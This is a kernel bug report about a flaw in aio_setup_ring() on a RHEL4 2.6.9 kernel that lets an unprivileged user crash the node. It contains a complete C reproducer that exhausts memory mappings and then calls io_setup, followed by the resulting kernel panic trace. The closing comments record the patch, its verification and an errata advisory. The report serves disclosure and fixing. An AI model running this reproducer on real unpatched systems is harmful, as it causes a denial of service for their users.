Kostantin Khorenko from OpenVZ/Virtuozzo linux kernel team has noticed the following issue on RHEL4 2.6.9-42.0.3 kernel. aio_setup_ring() function initializes info->nr_pages variable incorrectly, then this variable can be used in error path to free the allocated resources. By this way an unprivileged user can crash the node. This issue was fixed in 2.6.10 kernel by the following patch: http://linux.bkbits.net:8080/linux-2.6/gnupatch@418e67e3jfC3msWLXzcdTkI10dwtEg [finist@svconsole tmp]$ id uid=500(finist) gid=501(finist) groups=501(finist) [finist@svconsole tmp]$ uname -a Linux svconsole.sw.ru 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006 i686 i686 i386 GNU/Linux [finist@svconsole tmp]$ cat map_count.c #include <stdio.h> #include <sys/syscall.h> #include <unistd.h> #include <sys/mman.h> int main(void) { long res; unsigned long ctx = 0; int i = 0; void* map; while (1 == 1) { map = mmap(NULL, 100, PROT_READ, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0); if (map == MAP_FAILED) break; i++; map = mmap(NULL, 100, PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0); if (map == MAP_FAILED) break; i++; } printf("Done %d mmaps.\n", i); res = syscall(__NR_io_setup, 10000, &ctx); if (res != 0) { printf("Error in io_setup():%ld\n", res); } return 0; } [finist@svconsole tmp]$ cat /proc/sys/vm/max_map_count 65536 [finist@svconsole tmp]$ ./map_count Done 65526 mmaps. ---- crash here. mmap err: 12 Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c01489de *pde = 0eb55001 Oops: 0000 [#1] SMP Modules linked in: ip_nat_irc ip_nat_ftp iptable_nat ipt_helper ipt_state ipt_conntrack ip_conntrack_irc ip_conntrack_ftp ip_conntrack ipt_length ipt_LOG ipt_ttl ipt_tcpmss ipt_REJECT ipt_TOS ipt_tos ipt_multiport ipt_limit iptable_mangle md5 ipv6 8021q bridge atm iptable_filter ip_tables dm_mirror dm_mod uhci_hcd 3c59x mii floppy ext3 jbd CPU: 0 EIP: 0060:[<c01489de>] Not tainted VLI EFLAGS: 00010203 (2.6.9-42.0.3.ELsmp) EIP is at put_page+0x2/0x6d eax: 00000000 ebx: 00000001 ecx: cf679f7c edx: 00000000 esi: cfb9c610 edi: cc4dbbc4 ebp: cc4dbb80 esp: cf679f60 ds: 007b es: 007b ss: 0068 Process map_count (pid: 3130, threadinfo=cf679000 task=cf3fed10) Stack: c017a158 cfb9c5e0 cfb9c610 cff0073c cc4dbbc4 c017a30c c02e9bda 0000000c 0000004f 0000277f cc4dbb80 00002710 cc4dbb80 cfb9c5e0 cf679000 c017a4d3 bffffa80 ffffffea 00000000 c017b628 00002710 00000000 00000000 cf679000 Call Trace: [<c017a158>] aio_free_ring+0x1c/0x9f [<c017a30c>] aio_setup_ring+0x131/0x203 [<c017a4d3>] ioctx_alloc+0xf5/0x17f [<c017b628>] sys_io_setup+0x39/0xa5 [<c02d47cb>] syscall_call+0x7/0xb [<c02d007b>] packet_rcv+0x17e/0x307 Code: 35 94 18 00 e9 da fa ff ff e8 4f 94 18 00 e9 6f fb ff ff e8 21 94 18 00 e9 57 fe ff ff e8 3b 94 18 00 e9 d6 fe ff ff 90 90 89 c2 <8b> 00 f6 c4 80 74 2f 8b 52 0c 8b 02 89 d1 f6 c4 80 74 03 8b 4a <0>Fatal exception: panic in 5 seconds Kernel panic - not syncing: Fatal exception
committed in stream U5 build 42.40. A test kernel with this patch is available from http://people.redhat.com/~jbaron/rhel4/
fix verified on 42.0.7 with the included testcase
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2007-0014.html